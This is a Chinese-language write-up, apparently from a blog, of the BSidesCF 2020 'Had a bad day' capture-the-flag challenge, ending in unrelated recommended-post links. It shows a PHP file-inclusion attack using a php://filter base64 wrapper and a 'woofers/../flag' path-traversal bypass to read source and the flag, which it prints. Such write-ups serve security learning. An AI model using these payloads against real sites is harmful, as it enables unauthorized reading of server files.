[BSidesCF 2020]Had a bad day1

题目

这里有传参

文件包含使用伪协议读取flag

先读取index.php查看

复制代码
/index.php?category=php://filter/read=convert.base64-encode/resource=index

解码

index.php源码

php 复制代码
              <?php
				$file = $_GET['category'];

				if(isset($file))
				{
					if( strpos( $file, "woofers" ) !==  false || strpos( $file, "meowers" ) !==  false || strpos( $file, "index")){
						include ($file . '.php');
					}
					else{
						echo "Sorry, we currently only support woofers and meowers.";
					}
				}
				?>

传入的category需要有woofers,meowers,index才能包含传入以传入名为文件名的文件,我们要想办法包含flag.php

尝试直接读取/index.php?category=woofers/../flag

php 复制代码
/index.php?category=php://filter/read=convert.base64-encode/resource=woofers/../flag

解码

拿下flag

flag{85254eba-a050-49cd-a3be-4e9859e51241}

相关推荐
东风西巷23 分钟前
Balabolka:免费高效的文字转语音软件
前端·人工智能·学习·语音识别·软件需求
XISHI_TIANLAN2 小时前
【多模态学习】Q&A3:FFN的作用?Embedding生成方法的BERT和Word2Vec?非线性引入的作用?
学习·bert·embedding
KFCcrazy43 小时前
嵌入式学习日记(39)51单片机
嵌入式硬件·学习·51单片机
MuMuMu#3 小时前
JAVA NIO学习笔记基础强化学习总结
java·学习·nio
lingggggaaaa3 小时前
小迪安全v2023学习笔记(七十九讲)—— 中间件安全&IIS&Apache&Tomcat&Nginx&CVE
笔记·学习·安全·web安全·网络安全·中间件·apache
我登哥MVP3 小时前
Java File 类学习笔记
java·笔记·学习
mysla5 小时前
嵌入式学习day44-硬件—ARM体系架构
学习
微露清风5 小时前
系统性学习数据结构-第三讲-栈和队列
java·数据结构·学习
77qqqiqi6 小时前
学习字符串
学习
滴滴滴嘟嘟嘟.7 小时前
Qt动画功能学习
开发语言·qt·学习